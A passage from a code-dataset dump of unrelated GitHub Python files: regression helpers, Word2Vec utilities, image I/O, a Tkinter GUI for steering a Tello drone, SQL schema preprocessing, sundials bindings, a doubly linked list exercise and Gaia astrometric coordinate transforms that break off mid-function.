x_leaveout.T\n xtx = np.dot(xt, x_leaveout)\n xty = np.dot(xt, y)\n beta_hat = scipy.linalg.solve(xtx, xty, assume_a='sym')\n except np.linalg.LinAlgError:\n beta_hat = np.zeros(len(leave_out), dtype=np.dtype(float))\n\n # Calculate the variance of the residuals for the new estimated betas\n ss_leaveout = sigma_squared(x_leaveout, y, beta_hat)\n\n # Check to make sure that the ss_all and ss_leaveout differences aren't just precision-related\n if np.abs(ss_all - ss_leaveout) < np.finfo(float).eps * len(pp_idx):\n error_reduction[lost] = 0.\n else:\n error_reduction[lost] = 1 - (ss_all / ss_leaveout)\n\n return error_reduction\n\n\ndef sigma_squared(x, y, betas):\n return np.var(np.subtract(y, np.dot(x, betas).reshape(-1, 1)), ddof=1)\n\n\ndef index_of_nonzeros(arr):\n \"\"\"\n Returns an array that indexes all the non-zero elements of an array\n :param arr: np.ndarray\n :return: np.ndarray\n \"\"\"\n return np.where(arr != 0)[0]\n\n\ndef bool_to_index(arr):\n \"\"\"\n Returns an array that indexes all the True elements of a boolean array\n :param arr: np.ndarray\n :return: np.ndarray\n \"\"\"\n assert check.argument_type(arr, np.ndarray)\n return np.where(arr)[0]\n","repo_name":"moqri/inferelator","sub_path":"inferelator/regression/base_regression.py","file_name":"base_regression.py","file_ext":"py","file_size_in_byte":8903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"34809179728","text":"import gensim\r\nimport numpy as np\r\nimport scipy.sparse as sp\r\nfrom gensim.models import Word2Vec as _Word2Vec\r\nfrom distutils.version import LooseVersion\r\n\r\n\r\ndef normalized_laplacian_matrix(graph, r=-0.5):\r\n graph = graph + sp.eye(graph.shape[0], dtype=graph.dtype, format='csr')\r\n\r\n degree = graph.sum(1).A1\r\n degree_power = np.power(degree, r)\r\n graph = graph.tocoo(copy=False)\r\n graph.data *= degree_power[graph.row]\r\n graph.data *= degree_power[graph.col]\r\n graph = graph.tocsr(copy=False)\r\n return graph\r\n\r\n\r\nclass Word2Vec(_Word2Vec):\r\n \"\"\"A compatible version of Word2Vec\"\"\"\r\n\r\n def __init__(self, sentences=None, sg=0, hs=0, alpha=0.025, iter=5, size=100, window=5, workers=3, negative=5, seed=None, **kwargs):\r\n if LooseVersion(gensim.__version__) <= LooseVersion(\"4.0.0\"):\r\n super().__init__(sentences,\r\n size=size,\r\n window=window,\r\n min_count=0,\r\n alpha=alpha,\r\n sg=sg,\r\n 
workers=workers,\r\n iter=iter,\r\n negative=negative,\r\n hs=hs,\r\n compute_loss=True,\r\n seed=seed, **kwargs)\r\n\r\n else:\r\n super().__init__(sentences,\r\n vector_size=size,\r\n window=window,\r\n min_count=0,\r\n alpha=alpha,\r\n sg=sg,\r\n workers=workers,\r\n epochs=iter,\r\n negative=negative,\r\n hs=hs,\r\n compute_loss=True,\r\n seed=seed, **kwargs)\r\n\r\n def get_embedding(self):\r\n if LooseVersion(gensim.__version__) <= LooseVersion(\"4.0.0\"):\r\n embedding = self.wv.vectors[np.fromiter(\r\n map(int, self.wv.index2word), np.int32).argsort()]\r\n else:\r\n embedding = self.wv.vectors[np.fromiter(\r\n map(int, self.wv.index_to_key), np.int32).argsort()]\r\n\r\n return embedding\r\n","repo_name":"EdisonLeeeee/GraphGallery","sub_path":"graphgallery/gallery/embedding/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":450,"dataset":"github-code","pt":"52"} +{"seq_id":"39467452546","text":"from PIL import Image\nimport numpy as np\nfrom config import TMP_DIR, LEGISLATURA, MEMBERS\n\n\ndef load_images() -> np.array:\n files = [f\"{TMP_DIR}/{i+1}_{LEGISLATURA}.jpg\" for i in range(MEMBERS)]\n images = []\n for file in files:\n image_data = np.asarray(Image.open(file))\n # normalize to range [0, 1], from [0, 255]\n images.append(image_data.astype('float32') / 255)\n\n ret = np.asarray(images)\n return ret\n\ndef save_image(image_array, filename):\n rgb = image_array*255\n image = Image.fromarray(np.uint8(rgb), 'RGB')\n image.save(filename)\n","repo_name":"liopic/all-are-the-same","sub_path":"image_utils.py","file_name":"image_utils.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"25060385698","text":"from djitellopy import Tello\nimport cv2\nimport tkinter.font as tkFont\nimport tkinter as tk\nimport threading\n\n\nclass App:\n drone = Tello()\n\n def __init__(self, root):\n # setting title StreamTest.start()\n root.title(\"undefined\")\n # setting window size\n width = 423\n height = 256\n screenwidth = root.winfo_screenwidth()\n screenheight = root.winfo_screenheight()\n alignstr = '%dx%d+%d+%d' % (width, height, (screenwidth - width) / 2, (screenheight - height) / 2)\n root.geometry(alignstr)\n root.resizable(width=False, height=False)\n\n GButton_412 = tk.Button(root)\n GButton_412[\"bg\"] = \"#efefef\"\n ft = tkFont.Font(family='Times', size=10)\n GButton_412[\"font\"] = ft\n GButton_412[\"fg\"] = \"#000000\"\n GButton_412[\"justify\"] = \"center\"\n GButton_412[\"text\"] = \"Up\"\n GButton_412.place(x=70, y=40, width=70, height=25)\n GButton_412[\"command\"] = self.GButton_412_command\n\n GButton_132 = tk.Button(root)\n GButton_132[\"bg\"] = \"#efefef\"\n ft = tkFont.Font(family='Times', size=10)\n GButton_132[\"font\"] = ft\n GButton_132[\"fg\"] = \"#000000\"\n GButton_132[\"justify\"] = \"center\"\n GButton_132[\"text\"] = \"Down\"\n GButton_132.place(x=70, y=100, width=70, height=25)\n GButton_132[\"command\"] = self.GButton_132_command\n\n GButton_889 = tk.Button(root)\n GButton_889[\"bg\"] = \"#efefef\"\n ft = tkFont.Font(family='Times', size=10)\n GButton_889[\"font\"] = ft\n GButton_889[\"fg\"] = \"#000000\"\n GButton_889[\"justify\"] = \"center\"\n GButton_889[\"text\"] = \"Right\"\n GButton_889.place(x=140, y=70, width=70, height=25)\n GButton_889[\"command\"] = self.GButton_889_command\n\n GButton_387 = tk.Button(root)\n GButton_387[\"bg\"] = \"#efefef\"\n ft = 
tkFont.Font(family='Times', size=10)\n GButton_387[\"font\"] = ft\n GButton_387[\"fg\"] = \"#000000\"\n GButton_387[\"justify\"] = \"center\"\n GButton_387[\"text\"] = \"Left\"\n GButton_387.place(x=0, y=70, width=70, height=25)\n GButton_387[\"command\"] = self.GButton_387_command\n\n GButton_473 = tk.Button(root)\n GButton_473[\"bg\"] = \"#efefef\"\n ft = tkFont.Font(family='Times', size=10)\n GButton_473[\"font\"] = ft\n GButton_473[\"fg\"] = \"#000000\"\n GButton_473[\"justify\"] = \"center\"\n GButton_473[\"text\"] = \"Forward\"\n GButton_473.place(x=350, y=40, width=70, height=25)\n GButton_473[\"command\"] = self.GButton_473_command\n\n GButton_437 = tk.Button(root)\n GButton_437[\"bg\"] = \"#efefef\"\n ft = tkFont.Font(family='Times', size=10)\n GButton_437[\"font\"] = ft\n GButton_437[\"fg\"] = \"#000000\"\n GButton_437[\"justify\"] = \"center\"\n GButton_437[\"text\"] = \"Backward\"\n GButton_437.place(x=350, y=100, width=70, height=25)\n GButton_437[\"command\"] = self.GButton_437_command\n\n GButton_356 = tk.Button(root)\n GButton_356[\"bg\"] = \"#efefef\"\n ft = tkFont.Font(family='Times', size=10)\n GButton_356[\"font\"] = ft\n GButton_356[\"fg\"] = \"#000000\"\n GButton_356[\"justify\"] = \"center\"\n GButton_356[\"text\"] = \"L\"\n GButton_356.place(x=170, y=140, width=70, height=25)\n GButton_356[\"command\"] = self.GButton_356_command\n\n GButton_404 = tk.Button(root)\n GButton_404[\"bg\"] = \"#efefef\"\n ft = tkFont.Font(family='Times', size=10)\n GButton_404[\"font\"] = ft\n GButton_404[\"fg\"] = \"#000000\"\n GButton_404[\"justify\"] = \"center\"\n GButton_404[\"text\"] = \"R\"\n GButton_404.place(x=260, y=140, width=70, height=25)\n GButton_404[\"command\"] = self.GButton_404_command\n\n GMessage_349 = tk.Message(root)\n ft = tkFont.Font(family='Times', size=10)\n GMessage_349[\"font\"] = ft\n GMessage_349[\"fg\"] = \"#333333\"\n GMessage_349[\"justify\"] = \"center\"\n GMessage_349[\"text\"] = \"Tello :)\"\n GMessage_349.place(x=200, y=20, width=80, height=25)\n\n GButton_320 = tk.Button(root)\n GButton_320[\"bg\"] = \"#efefef\"\n ft = tkFont.Font(family='Times', size=10)\n GButton_320[\"font\"] = ft\n GButton_320[\"fg\"] = \"#000000\"\n GButton_320[\"justify\"] = \"center\"\n GButton_320[\"text\"] = \"Connect\"\n GButton_320.place(x=0, y=190, width=70, height=25)\n GButton_320[\"command\"] = self.GButton_320_command\n\n GButton_760 = tk.Button(root)\n GButton_760[\"bg\"] = \"#efefef\"\n ft = tkFont.Font(family='Times', size=10)\n GButton_760[\"font\"] = ft\n GButton_760[\"fg\"] = \"#000000\"\n GButton_760[\"justify\"] = \"center\"\n GButton_760[\"text\"] = \"Disconnect\"\n GButton_760.place(x=0, y=220, width=70, height=25)\n GButton_760[\"command\"] = self.GButton_760_command\n\n GButton_472 = tk.Button(root)\n GButton_472[\"bg\"] = \"#efefef\"\n ft = tkFont.Font(family='Times', size=10)\n GButton_472[\"font\"] = ft\n GButton_472[\"fg\"] = \"#000000\"\n GButton_472[\"justify\"] = \"center\"\n GButton_472[\"text\"] = \"Takeoff\"\n GButton_472.place(x=350, y=190, width=70, height=25)\n GButton_472[\"command\"] = self.GButton_472_command\n\n GButton_769 = tk.Button(root)\n GButton_769[\"bg\"] = \"#efefef\"\n ft = tkFont.Font(family='Times', size=10)\n GButton_769[\"font\"] = ft\n GButton_769[\"fg\"] = \"#000000\"\n GButton_769[\"justify\"] = \"center\"\n GButton_769[\"text\"] = \"Land\"\n GButton_769.place(x=350, y=220, width=70, height=25)\n GButton_769[\"command\"] = self.GButton_769_command\n\n def GButton_412_command(self):\n self.drone.move_up(40)\n\n def 
GButton_132_command(self):\n self.drone.move_down(40)\n\n def GButton_889_command(self):\n self.drone.move_right(40)\n\n def GButton_387_command(self):\n self.drone.move_left(40)\n\n def GButton_473_command(self):\n self.drone.move_forward(40)\n\n def GButton_437_command(self):\n self.drone.move_back(40)\n\n def GButton_356_command(self):\n self.drone.rotate_clockwise(30)\n\n def GButton_404_command(self):\n self.drone.rotate_counter_clockwise(30)\n\n def showStream(self):\n self.drone.streamon()\n while True:\n img = self.drone.get_frame_read().frame\n cv2.imshow(\"image\", img)\n cv2.waitKey(1)\n\n def GButton_320_command(self):\n self.drone.connect()\n streamTest = threading.Thread(target=self.showStream)\n streamTest.start()\n print(self.drone.get_battery())\n\n def GButton_760_command(self):\n self.drone.end()\n\n\n def GButton_472_command(self):\n self.drone.takeoff()\n\n def GButton_769_command(self):\n self.drone.land()\n\n","repo_name":"MorsyB/Graphics-Lab","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":6825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42850189421","text":"import re\nfrom random import Random\nfrom typing import Dict, Optional\n\n\nSQL_TOKENS = {\n \"select\",\n \"from\",\n \"where\",\n \"group\",\n \"order\",\n \"limit\",\n \"intersect\",\n \"union\",\n \"except\",\n \"join\",\n \"on\",\n \"as\",\n \"not\",\n \"between\",\n \"=\",\n \">\",\n \"<\",\n \">=\",\n \"<=\",\n \"!=\",\n \"in\",\n \"like\",\n \"is\",\n \"exists\",\n \"none\",\n \"max\",\n \"min\",\n \"count\",\n \"sum\",\n \"avg\",\n \"or\",\n \"and\",\n}\n\n\ndef clean_str(target: str) -> Optional[str]:\n if not target:\n return None\n\n target = re.sub(r\"[^\\x00-\\x7f]\", r\" \", target)\n line = re.sub(r\"''\", r\" \", target)\n line = re.sub(r\"``\", r\" \", line)\n line = re.sub(r\"\\\"\", r\"'\", line)\n line = re.sub(r\" +\", \" \", line)\n return line.strip()\n\n\ndef add_schema_description(\n lower: bool, add_column_types: bool, tables_json: Dict, shuffle_schema: bool, random: Random\n):\n\n table_names = tables_json[\"table_names_original\"]\n\n if shuffle_schema:\n random.shuffle(table_names)\n\n columns = [\n (column_name[0], column_name[1], column_type)\n for column_name, column_type in zip(tables_json[\"column_names_original\"], tables_json[\"column_types\"])\n ]\n schema_description = \"\"\n schema_structured = {}\n for table_index, table_name in enumerate(table_names):\n if lower:\n table_name = table_name.lower()\n if table_index == 0:\n schema_description += \" \" + table_name\n else:\n schema_description += \" \" + table_name\n schema_structured[table_name] = []\n schema_description += \" \"\n table_columns = [column for column in columns if column[0] == table_index]\n\n if shuffle_schema:\n random.shuffle(table_columns)\n\n for table_column in table_columns:\n if add_column_types:\n column_desc = (\n f\" \"\n f\"{table_column[1].lower() if lower else table_column[1]}\"\n )\n else:\n column_desc = f\"{table_column[1].lower() if lower else table_column[1]}\"\n schema_description += \" \" + column_desc\n schema_structured[table_name].append(column_desc)\n\n return schema_description, schema_structured\n","repo_name":"hirupert/sede","sub_path":"src/preprocessing/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"52"} +{"seq_id":"31804089267","text":"from __future__ 
import annotations\n\nimport logging\nfrom typing import (\n Optional,\n Union,\n NewType,\n List,\n Any,\n Callable\n)\n\n\nimport numpy as np # type: ignore\nimport numba # type: ignore\nfrom numba.core.typing import cffi_utils # type: ignore\n\nfrom sunode import _cvodes\n\n\n__all__ = [\n \"lib\", \"ffi\", \"ERRORS\", \"Borrows\", \"notnull\",\n \"check\", \"check_ptr\", \"check_code\", \"as_numpy\"\n]\n\n\nlogger = logging.getLogger(\"sunode.basic\")\n\nlib: Any = _cvodes.lib\nffi: Any = _cvodes.ffi\n\ncffi_utils.register_module(_cvodes)\ncffi_utils.register_type(\n ffi.typeof(\"N_Vector\").item, numba.types.Opaque(\"N_Vector\")\n)\ncffi_utils.register_type(\n ffi.typeof(\"SUNMatrix\").item, numba.types.Opaque(\"SUNMatrix\")\n)\n\n_data_dtype = cffi_utils.map_type(ffi.typeof(\"realtype\"))\n_index_dtype = cffi_utils.map_type(ffi.typeof(\"sunindextype\"))\ndata_dtype: Any = np.dtype(_data_dtype.name)\nindex_dtype: Any = np.dtype(_index_dtype.name)\n\n\nCPointer = NewType(\"CPointer\", int)\n\n\nERRORS = {}\nfor name in dir(lib):\n item = getattr(lib, name)\n if not isinstance(item, int):\n continue\n if name.startswith('CV_') or name.startswith('CVLS_') or name.startswith('SUN_NLS_'):\n ERRORS[item] = name\n\n\nclass Borrows:\n def __init__(self) -> None:\n self._borrowed: List[Any] = []\n\n def borrow(self, arg: Any) -> None:\n self._borrowed.append(arg)\n\n def release_borrowed_func(self) -> Callable[[], None]:\n borrowed = self._borrowed\n\n # Does not keep a reference to self\n def release() -> None:\n borrowed.clear()\n\n return release\n\n\ndef notnull(ptr: CPointer, msg: Optional[str] = None) -> CPointer:\n if ptr == ffi.NULL:\n if msg is None:\n raise ValueError(\"CPointer is NULL.\")\n else:\n raise ValueError(msg)\n return ptr\n\n\ndef check(retcode: Union[int, CPointer]) -> Union[None, CPointer]:\n if isinstance(retcode, int) and retcode != 0:\n raise ValueError('Bad return code from sundials: %s (%s)' % (ERRORS[retcode], retcode))\n if isinstance(retcode, ffi.CData):\n if retcode == ffi.NULL:\n raise ValueError('Return value of sundials is NULL.')\n return retcode\n return None\n\n\ndef check_ptr(retval: CPointer) -> CPointer:\n if retval == ffi.NULL:\n raise ValueError('Return value of sundials is NULL.')\n return retval\n\n\ndef check_code(retval: int) -> int:\n if retval != 0:\n raise ValueError('Bad return code from sundials: %s (%s)' % (ERRORS[retval], retval))\n return retval\n\n\nclass RefCount:\n def __init__(self) -> None:\n self.count: int = 0\n\n def borrow(self) -> None:\n self.count += 1\n\n def release(self) -> None:\n assert self.count > 0\n self.count -= 1\n\n def is_zero(self) -> bool:\n assert self.count >= 0\n return self.count == 0\n\n\ndef as_numpy(\n owner: Any,\n ptr: CPointer,\n size: int,\n dtype: np.dtype,\n counter: Optional[RefCount] = None,\n) -> np.ndarray:\n if size < 0:\n raise ValueError(\"Array size must not be negative.\")\n\n if size != 0:\n notnull(ptr)\n\n def release(ptr: CPointer) -> None:\n nonlocal owner\n if counter is not None:\n counter.release()\n\n if counter is not None:\n counter.borrow()\n ptr = ffi.gc(ptr, release)\n buffer = ffi.buffer(ptr, size * dtype.itemsize)\n return np.frombuffer(buffer, dtype)\n","repo_name":"pymc-devs/sunode","sub_path":"sunode/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":3424,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"52"} +{"seq_id":"23598109764","text":"from collections import defaultdict\n\nclass Node:\n\tdef 
__init__(self,data):\n\t\tself.data=data\n\t\tself.next=None\n\t\tself.prev=None\n\n\nclass Doubly:\n\tdef __init__(self):\n\t\tself.head = None\n\n\n\tdef append(self, data):\n\t\tnew_node = Node(data)\n\t\tif self.head is None:\n\t\t\t# new_node.prev = None\n\t\t\tself.head = new_node\n\t\telse:\n\t\t\tcur=self.head\n\t\t\twhile cur.next:\n\t\t\t\tcur=cur.next\n\n\t\t\tcur.next=new_node\n\t\t\tnew_node.prev=cur\n\t\t\tnew_node.next=None\n\n\n\tdef prepend(self,data):\n\t\tnew_node=Node(data)\n\t\tif self.head is None:\n\t\t\tself.head = new_node\n\t\telse:\n\t\t\tself.head.prev = new_node\n\t\t\tnew_node.next= self.head\n\t\t\tself.head = new_node\n\tdef add_after(self,data,key):\n\t\tnew_node=Node(data)\n\t\tcur=self.head\n\n\t\twhile cur:\n\t\t\tif cur.data==key:\n\t\t\t\tnxt=cur.next\n\t\t\t\tcur.next=new_node\n\t\t\t\tnew_node.prev=cur\n\t\t\t\tnew_node.next=nxt\n\t\t\t\tnxt.prev=new_node\n\t\t\t\treturn\n\t\t\tcur=cur.next\n\n\t\tprint('key not found')\n\n\tdef display(self):\n\t\tcur = self.head\n\n\t\twhile cur:\n\t\t\tprint(cur.data)\n\t\t\tcur=cur.next\n\n\tdef reverse(self):\n\t\ttemp = None\n\t\tcur=self.head\n\n\t\twhile cur:\n\t\t\ttemp=cur.prev\n\t\t\tcur.prev=cur.next\n\t\t\tcur.next=temp\n\t\t\tcur=cur.prev\n\t\tif temp:\n\t\t\tself.head=temp.prev\n\n\tdef pairs_with_sum(self,sum_val):\n\t\tpairs = []\n\t\tp = self.head\n\t\tq=None\n\t\twhile p:\n\t\t\tq=p.next\n\t\t\twhile q:\n\t\t\t\tif p.data+q.data==sum_val:\n\t\t\t\t\tpairs.append([p.data,q.data])\n\t\t\t\tq=q.next\n\t\t\tp=p.next\n\t\treturn pairs\n\n\tdef remove_duplicates(self):\n\t\tcur = self.head\n\t\tduplicates=defaultdict(int)\n\t\t# prev=\n\n\t\twhile cur:\n\t\t\tif duplicates[cur.data]==0:\n\t\t\t\tduplicates[cur.data]+=1\n\t\t\t\tcur=cur.next\n\t\t\telse:\n\t\t\t\tnxt=cur.next\n\t\t\t\tself.delete_node(cur)\n\t\t\t\tcur=nxt\n\n\tdef delete(self,key):\n\t\tcur =self.head\n\n\t\twhile cur:\n\t\t\t\n\t\t\tif cur.data==key and cur==self.head:\n\t\t\t\t#case 1:\n\t\t\t\tif not cur.next:\n\t\t\t\t\tcur=None\n\t\t\t\t\tself.head=None\n\t\t\t\t\treturn\n\t\t\t\t# case 2:\n\t\t\t\telse:\n\t\t\t\t\tnxt=cur.next\n\t\t\t\t\tcur.next=None\n\t\t\t\t\tcur=None\n\t\t\t\t\tnxt.prev=None\n\t\t\t\t\tself.head=nxt\n\t\t\t\t\treturn\n\n\t\t\telif cur.data==key:\n\t\t\t\t#case 3\n\t\t\t\tif cur.next:\n\t\t\t\t\tnxt=cur.next\n\t\t\t\t\tprev=cur.prev\n\t\t\t\t\tprev.next=nxt\n\t\t\t\t\tnxt.prev=prev\n\t\t\t\t\tcur.next=None\n\t\t\t\t\tcur.prev=None\n\t\t\t\t\tcur=None\n\t\t\t\t\treturn\n\t\t\t\telse:\n\t\t\t\t\t# case 4\n\t\t\t\t\tprev=cur.prev\n\t\t\t\t\tprev.next=None\n\t\t\t\t\tcur.prev=None\n\t\t\t\t\tcur=None\n\t\t\t\t\treturn\n\n\t\t\tcur=cur.next\n\n\tdef delete_node(self,node):\n\t\tcur =self.head\n\n\t\twhile cur:\n\t\t\t\n\t\t\tif cur==node and cur==self.head:\n\t\t\t\t#case 1:\n\t\t\t\tif not cur.next:\n\t\t\t\t\tcur=None\n\t\t\t\t\tself.head=None\n\t\t\t\t\treturn\n\t\t\t\t# case 2:\n\t\t\t\telse:\n\t\t\t\t\tnxt=cur.next\n\t\t\t\t\tcur.next=None\n\t\t\t\t\tcur=None\n\t\t\t\t\tnxt.prev=None\n\t\t\t\t\tself.head=nxt\n\t\t\t\t\treturn\n\n\t\t\telif cur==node:\n\t\t\t\t#case 3\n\t\t\t\tif cur.next:\n\t\t\t\t\tnxt=cur.next\n\t\t\t\t\tprev=cur.prev\n\t\t\t\t\tprev.next=nxt\n\t\t\t\t\tnxt.prev=prev\n\t\t\t\t\tcur.next=None\n\t\t\t\t\tcur.prev=None\n\t\t\t\t\tcur=None\n\t\t\t\t\treturn\n\t\t\t\telse:\n\t\t\t\t\t# case 
4\n\t\t\t\t\tprev=cur.prev\n\t\t\t\t\tprev.next=None\n\t\t\t\t\tcur.prev=None\n\t\t\t\t\tcur=None\n\t\t\t\t\treturn\n\n\t\t\tcur=cur.next\n\n\n\n\n\n\n\n\nmy_list=Doubly()\nmy_list.append(1)\nmy_list.append(2)\nmy_list.append(3)\nmy_list.append(4)\n\n\nmy_list.prepend(0)\nmy_list.add_after(5,3)\n# my_list.delete(0)\n# my_list.display()\n# print(my_list.pairs_with_sum(0))\n# my_list.remove_duplicates()\nmy_list.display()\n","repo_name":"tichi97/code_practice","sub_path":"doublylists.py","file_name":"doublylists.py","file_ext":"py","file_size_in_byte":3101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31648300605","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 25 09:46:35 2018\n\n@author: David Hobbs, Lund Observatory\nv 0.1 author Paul McMillan\n\"\"\"\nimport numpy as np\n\nmas2deg = 1.0/(3600*1000)\ndeg2rad = np.pi/180.0\nmas2rad = mas2deg * deg2rad\n\nAprime = np.asarray([[-0.0548755604162154, -0.8734370902348850, -0.4838350155487132],\n [+0.4941094278755837, -0.4448296299600112, +0.7469822444972189],\n [-0.8676661490190047, -0.1980763734312015, +0.4559837761750669]])\n\n\ndef transformGalToIcrs( GalCoords, GalUncerts, GalC = None) :\n '''Transforms coordinates and uncertainties (/covariance matrix) from Galactic coordinates to Equatorial (ICRS) coordinates\n\n This code impliments Gaia Data Release 2, Documentation v1.1,\n Section 3.1.7: Transformations of astrometric data and error propagation (Alexey Butkevich, Lennart Lindegren,\n https://gea.esac.esa.int/archive/documentation/GDR2/Data_processing/chap_cu3ast/sec_cu3ast_intro/ssec_cu3ast_intro_tansforms.html)\n Code written by David Hobbs & Paul McMillan\n\n Parameters:\n ------------\n\n GalCoords: Array of dimensions (N,5), with N number of coords\n (l, b, parallax, pm_lStar, pm_b). Units (respectively) deg, deg, mas, mas/yr, mas/yr.\n Must be in an array of dimensions (N,5) where N is number of coords\n\n GalUncerts: Array of dimensions (N,5), with N number of coords\n (l_error, b_error, parallax_error, pm_lStar_error, pm_b_error). Units mas or mas/yr\n Must be in an array of dimensions (N,5) where N is number of coords\n\n GalC [optional]: Array of dimensions (N,5,5), with N number of coords\n Covariance Matrix describing uncertainties in galactic coordinates.\n Writing the Errors_in array (above) as sigma_i, this matrix, C, has diagonal elements\n C_ii = sigma_i**2,\n and off-diagonal elements\n C_ij = rho_ij sigma_i sigma_j,\n with rho_ij the correlation coefficients\n\n Returns:\n -----------\n\n EqCoords: Array of dimensions (N,5), with N number of coords\n (ra, dec, parallax, pm_raStar, pm_dec). Units (respectively) deg, deg, mas, mas/yr, mas/yr.\n\n EqUncerts: Array of dimensions (N,5), with N number of coords\n (ra_error, dec_error, parallax_error, pm_raStar_error, pm_dec_error). 
Units mas or mas/yr.\n\n EqC : Array of dimensions (N,5,5), with N number of coords\n Covariance Matrix describing uncertainties in Galactic coordinates.\n Writing the Errors_in array (above) as sigma_i, this matrix, C, has diagonal elements\n C_ii = sigma_i**2,\n and off-diagonal elements\n C_ij = rho_ij sigma_i sigma_j,\n with rho_ij the correlation coefficients\n\n Notes:\n ------------\n If GalC is provided, EqErrors is ignored (as redundant)\n\n If GalC is not provided, correlation coefficients are assumed to be zero\n\n '''\n\n # Number of terms\n nterms = GalCoords.shape[0]\n\n CoordConverter = np.array([deg2rad,deg2rad,mas2rad,mas2rad,mas2rad])\n lbCoords = GalCoords * CoordConverter\n\n lbUncerts = GalUncerts*mas2rad\n if GalC is None :\n Cgal = np.zeros([nterms,5,5])\n row,col = np.diag_indices(5)\n Cgal[:,row,col] = lbUncerts**2\n else :\n Cgal = GalC*mas2rad*mas2rad\n l = lbCoords[:,0]\n b = lbCoords[:,1]\n # Construct rGal\n rGal = np.transpose(np.asarray([np.cos(l)*np.cos(b),\n np.sin(l)*np.cos(b),\n np.sin(b)]))\n # Construct rIcrs\n rIcrs = np.einsum('ij,kj->ki',np.transpose(Aprime),rGal)\n\n alpha = np.arctan2(rIcrs[:,1], rIcrs[:,0])\n delta = np.arctan2(rIcrs[:,2], np.sqrt(rIcrs[:,0]**2 + rIcrs[:,1]**2))\n\n # The transformation of the proper motion components\n pIcrs = np.asarray([-np.sin(alpha),\n np.cos(alpha),\n np.zeros_like(alpha)])\n qIcrs = np.asarray([-np.cos(alpha)*np.sin(delta),\n -np.sin(alpha)*np.sin(delta),\n np.cos(delta)])\n\n pGal = np.asarray([-np.sin(l),\n np.cos(l),\n np.zeros_like(l)])\n qGal = np.asarray([-np.cos(l)*np.sin(b),\n -np.sin(l)*np.sin(b),\n np.cos(b)])\n mulStar = lbCoords[:,3]\n mub = lbCoords[:,4]\n muGal = pGal*mulStar + qGal*mub\n muIcrs = np.einsum('ij,jk ->ik',np.transpose(Aprime),muGal)\n\n # Icrs proper motions\n muAlphaStar = np.sum(pIcrs*muIcrs,axis=0)\n muDelta = np.sum(qIcrs*muIcrs,axis=0)\n\n gal = (np.hstack((pGal.T, qGal.T))).reshape(nterms,2,3)\n icrs = (np.hstack((pIcrs.T, qIcrs.T))).reshape(nterms,2,3)\n\n tmp = np.einsum('ij,klj->kil',Aprime,icrs)\n galT = np.einsum('ijk->ikj', gal)\n G = np.einsum('ijk,ikl->ijl', gal,tmp)\n # Jacobian\n\n Arr0 = np.zeros(nterms)\n Arr1 = np.ones(nterms)\n J = np.asarray([[G[:,0,0], G[:,0,1], Arr0, Arr0, Arr0],\n [G[:,1,0], G[:,1,1], Arr0, Arr0, Arr0],\n [ Arr0, Arr0, Arr1, Arr0, Arr0],\n [ Arr0, Arr0, Arr0, G[:,0,0], G[:,0,1]],\n [ Arr0, Arr0, Arr0, G[:,1,0], G[:,1,1]]])\n J = np.einsum('ijk->kij',J)\n JT = np.einsum('ijk->ikj',J)\n\n tmp = np.einsum('ijk,ikl->ijl',JT,Cgal)\n EqC = np.matmul(np.matmul(JT,Cgal),J)\n EqCoords = np.atleast_2d(np.asarray((alpha,delta,lbCoords[:,2],muAlphaStar,muDelta))).T/CoordConverter\n EqUncerts = np.atleast_2d(np.sqrt(np.diagonal(EqC,axis1=1,axis2=2)))/mas2rad\n EqC = EqC/mas2rad**2\n return EqCoords, EqUncerts, EqC\n\n\ndef transformIcrsToGal( EqCoords, EqUncerts, EqC = None) :\n '''Transforms coordinates and uncertainties (/covariance matrix) from Equatorial (ICRS) coordinates to Galactic coordinates\n\n This code impliments Gaia Data Release 2, Documentation v1.1,\n Section 3.1.7: Transformations of astrometric data and error propagation (Alexey Butkevich, Lennart Lindegren,\n https://gea.esac.esa.int/archive/documentation/GDR2/Data_processing/chap_cu3ast/sec_cu3ast_intro/ssec_cu3ast_intro_tansforms.html)\n Code written by David Hobbs & Paul McMillan\n\n Parameters:\n ------------\n\n EqCoords: Array of dimensions (N,5), with N number of coords\n (ra, dec, parallax, pm_raStar, pm_dec). 
Units (respectively) deg, deg, mas, mas/yr, mas/yr.\n Must be in an array of dimensions (N,5) where N is number of coords\n\n EqUncerts: Array of dimensions (N,5), with N number of coords\n (ra_error, dec_error, parallax_error, pm_raStar_error, pm_dec_error). Units mas or mas/yr\n Must be in an array of dimensions (N,5) where N is number of coords\n\n EqC [optional]: Array of dimensions (N,5,5), with N number of coords\n Covariance Matrix describing uncertainties in equatorial coordinates.\n Writing an individual objects EqUncerts array (above) as sigma_i, this matrix, C, has diagonal elements\n C_ii = sigma_i**2,\n and off-diagonal elements\n C_ij = rho_ij sigma_i sigma_j,\n with rho_ij the correlation coefficients\n\n Returns:\n -----------\n\n GalCoords: Array of dimensions (N,5), with N number of coords\n (l, b, parallax, pm_lStar, pm_b). Units (respectively) deg, deg, mas, mas/yr, mas/yr.\n\n GalUncerts: Array of dimensions (N,5), with N number of coords\n (l_error, b_error, parallax_error, pm_lStar_error, pm_b_error). Units mas or mas/yr.\n\n GalC : Array of dimensions (N,5,5), with N number of coords\n Covariance Matrix describing uncertainties in Galactic coordinates.\n Writing the GalUncerts array (above) as sigma_i, this matrix, C, has diagonal elements\n C_ii = sigma_i**2,\n and off-diagonal elements\n C_ij = rho_ij sigma_i sigma_j,\n with rho_ij the correlation coefficients\n\n Notes:\n ------------\n If EqC is provided, EqUncerts is ignored (as redundant)\n\n If EqC is not provided, correlation coefficients are assumed to be zero\n\n '''\n # Number of 